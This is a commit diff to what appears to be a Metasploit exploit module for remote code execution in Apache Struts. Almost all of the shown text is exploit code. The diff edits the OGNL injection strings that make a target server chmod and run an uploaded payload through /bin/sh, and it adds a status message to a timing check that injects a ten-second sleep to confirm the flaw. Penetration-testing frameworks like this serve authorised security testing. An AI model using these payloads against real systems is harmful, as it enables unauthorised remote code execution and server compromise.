check function now tells user about delay

Author: Console

modules/exploits/multi/http/struts_code_exec_parameters.rb

@@ -96,14 +96,15 @@ def exploit
 		pl_exe = generate_payload_exe
 		chunk_length = 384
 		append = 'false'
-
+#		java_cmd = "@java.lang.Runtime@getRuntime().exec(%s)"
 		#Now arch specific...
 		case target['Platform']
 		when 'linux'
 			chunk_length = 128 #Complains of a long filename if left default.
 			@payload_exe = "/tmp/#{@payload_exe}"
-			chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh@-c@chmod +x #{@payload_exe}\".split(\"@\"))"
-			exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh@-c@#{@payload_exe}\".split(\"@\"))"
+#			chmod_cmd = java_cmd % '\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\")'
+			chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
+			exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
 		when 'java'
 			@payload_exe << ".jar"
 			pl_exe = payload.encoded_jar.pack
@@ -147,6 +148,7 @@ def java_upload_part(part, filename, append = 'false')
 	def check
 		check_cmd = "@java.lang.Thread@sleep(10000)"
 		t1 = Time.now
+		print_status("Asking remote server to sleep for 10 seconds")
 		response = execute_command(check_cmd)
 		t2 = Time.now
 		delta = t2 - t1